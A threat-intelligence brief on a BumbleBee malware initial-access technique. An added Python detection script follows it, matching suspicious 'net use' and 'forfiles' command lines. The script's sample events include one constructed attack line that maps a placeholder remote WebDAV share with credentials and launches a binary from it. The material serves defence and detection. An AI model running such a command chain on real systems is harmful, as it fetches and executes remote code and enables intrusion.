BumbleBee Swarms with QakBot's Takedown
Category: Malware Campaign | Industry: Global | Source: @Kostastsale - X
With the abrupt Qakbot hiatus, thanks to the FBI and international law enforcement, security researchers have noticed an uptick in BumbleBee malware distribution. A notable BumbleBee TTP was reported by security researcher and DFIR Report member Kostas (@Kostastsale on X/Twitter). The command used for the malware's initial entry ran a command line (cmd) that mapped a network drive to a remote website, passing user credentials, and downloaded a file from it. A 'forfiles' command then searched a specific directory for files named 'notepad.exe'; for each instance found, it invoked '%cd%/0.exe', implying some form of file manipulation or execution. The command concluded by forcefully disconnecting the network drive.
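The chain above (a 'net use' mapping to a web-hosted share, 'forfiles' hunting for notepad.exe, a binary launched from %cd%, then a forced '/delete') can be turned into a process-creation detection. The following is an added example, not code from the report or from Kostas; the events are constructed, the hosts and credentials are placeholders, and treating '@80'/'@ssl' or an http URL in 'net use' as the "remote website" mapping is an assumption.

```python
import re

# Constructed process-creation command lines for illustration only; hosts,
# users and passwords are placeholders, not values from the original report.
SAMPLE_EVENTS = [
    r'cmd.exe /c net use \\dav.example.invalid@80\s /user:USER PASS '
    r'& forfiles /p C:\Windows /m notepad.exe /c "%cd%\0.exe" '
    r'& net use \\dav.example.invalid@80\s /delete /y',
    r'cmd.exe /c net use Z: \\files.example.invalid\share /persistent:no',
    r'forfiles /p C:\logs /m *.log /d -30 /c "cmd /c del @file"',
]

# One regex per behaviour the report describes. "net_use_web" assumes the
# remote website is reached as a WebDAV share (@80/@443/@ssl) or an http URL.
INDICATORS = {
    "net_use_web": re.compile(r"net\s+use\b.*?(?:@(?:80|443|ssl)\\|https?://)", re.I),
    "forfiles_notepad": re.compile(r"forfiles\b.*?/m\s+notepad\.exe", re.I),
    "forfiles_cd_exec": re.compile(r'forfiles\b.*?/c\s+"?%cd%[\\/]\S+\.exe', re.I),
    "net_use_delete": re.compile(r"net\s+use\b.*?/delete", re.I),
}


def matched_indicators(cmdline):
    """Return the sorted names of every indicator that fires on a command line."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(cmdline))


def is_suspicious(cmdline):
    """forfiles launching a binary out of %cd% is enough on its own; otherwise
    require the web share mapping combined with the notepad.exe search."""
    hits = set(matched_indicators(cmdline))
    return "forfiles_cd_exec" in hits or {"net_use_web", "forfiles_notepad"} <= hits


def scan(events):
    """Return (command line, indicators) for every event judged suspicious."""
    return [(c, matched_indicators(c)) for c in events if is_suspicious(c)]


if __name__ == "__main__":
    for cmdline, hits in scan(SAMPLE_EVENTS):
        print(hits, "<-", cmdline)
```

Only the first constructed event fires; the benign drive mapping and the routine log-cleanup 'forfiles' invocation are left alone.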